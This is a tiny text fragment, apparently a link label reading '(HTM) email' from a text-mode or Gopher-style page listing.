 (HTM) email